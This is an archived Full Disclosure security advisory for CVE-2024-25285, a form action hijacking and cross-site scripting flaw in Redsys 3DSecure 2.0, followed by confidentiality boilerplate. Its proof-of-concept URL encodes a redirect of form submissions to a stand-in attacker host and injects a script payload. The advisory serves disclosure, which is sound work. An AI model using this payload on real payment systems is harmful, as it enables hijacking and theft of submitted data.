Full Disclosure mailing list archives

Product: 3DSecure 2.0
Manufacturer: Redsys
Affected Version(s): 3DSecure 2.0 3DS Method Authentication
Tested Version(s): 3DSecure 2.0 3DS Method Authentication
Vulnerability Type: Cross-Site Scripting (XSS)
Risk Level: Medium
Solution Status: Not yet fixed
Manufacturer Notification: 2024-01-17
Solution Date: N/A
Public Disclosure: 2024-09-17
CVE Reference: CVE-2024-25285

Overview:
3DSecure 2.0 is vulnerable to form action hijacking via the threeDSMethodNotificationURL parameter. This flaw allows 
attackers to change the destination website for form submissions, enabling data theft.

Vulnerability Details:
The threeDSMethodNotificationURL parameter is vulnerable to modification, allowing attackers to redirect form 
submissions to malicious destinations.

Proof of Concept (PoC):
By modifying the threeDSMethodNotificationURL parameter in a POST request, an attacker can change the form's action 
URL. Example:

https://sis-d.redsys.es/sis-simulador-web/threeDsMethod.jsp?threeDSMethodData=eyJ0aHJlZURTTWV0aG9kTm90aWZpY2F0aW9uVVJMIjoiaHR0cHM6Ly9hdHRhY2tlci5jb20iLCJ0aHJlZURTU2VydmVyVHJhbnNJRCI6IjM5NDA4Mzk2LTdjY2MtNGU4YS04NjU2LThmMTZlNmNlMDQ5OCJ9%3d%3dld4ga%22%3e%3cscript%3ealert(1)%3c%2fscript%3epsoojei88ze

Solution:
No solution is currently available. Redsys has been notified.

References:
OWASP Web Security Testing Guide: Form Action Hijacking

Discoverer:
Reported by Rubén López Herrera

________________________________

Este mensaje y sus adjuntos se dirigen exclusivamente a su destinatario, puede contener información privilegiada o 
confidencial y es para uso exclusivo de la persona o entidad de destino. Si no es usted. el destinatario indicado, 
queda notificado de que la lectura, utilización, divulgación y/o copia sin autorización puede estar prohibida en virtud 
de la legislación vigente. Si ha recibido este mensaje por error, le rogamos que nos lo comunique inmediatamente por 
esta misma vía y proceda a su destrucción.

The information contained in this transmission is confidential and privileged information intended only for the use of 
the individual or entity named above. If the reader of this message is not the intended recipient, you are hereby 
notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have 
received this transmission in error, do not read it. Please immediately reply to the sender that you have received this 
communication in error and then delete it.

Esta mensagem e seus anexos se dirigem exclusivamente ao seu destinatário, pode conter informação privilegiada ou 
confidencial e é para uso exclusivo da pessoa ou entidade de destino. Se não é vossa senhoria o destinatário indicado, 
fica notificado de que a leitura, utilização, divulgação e/ou cópia sem autorização pode estar proibida em virtude da 
legislação vigente. Se recebeu esta mensagem por erro, rogamos-lhe que nos o comunique imediatamente por esta mesma via 
e proceda a sua destruição
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Current thread:

• CVE-2024-25285 - RedSys - 3DSecure 2.0 is vulnerable to form action hijacking RUBEN LOPEZ HERRERA (Sep 11)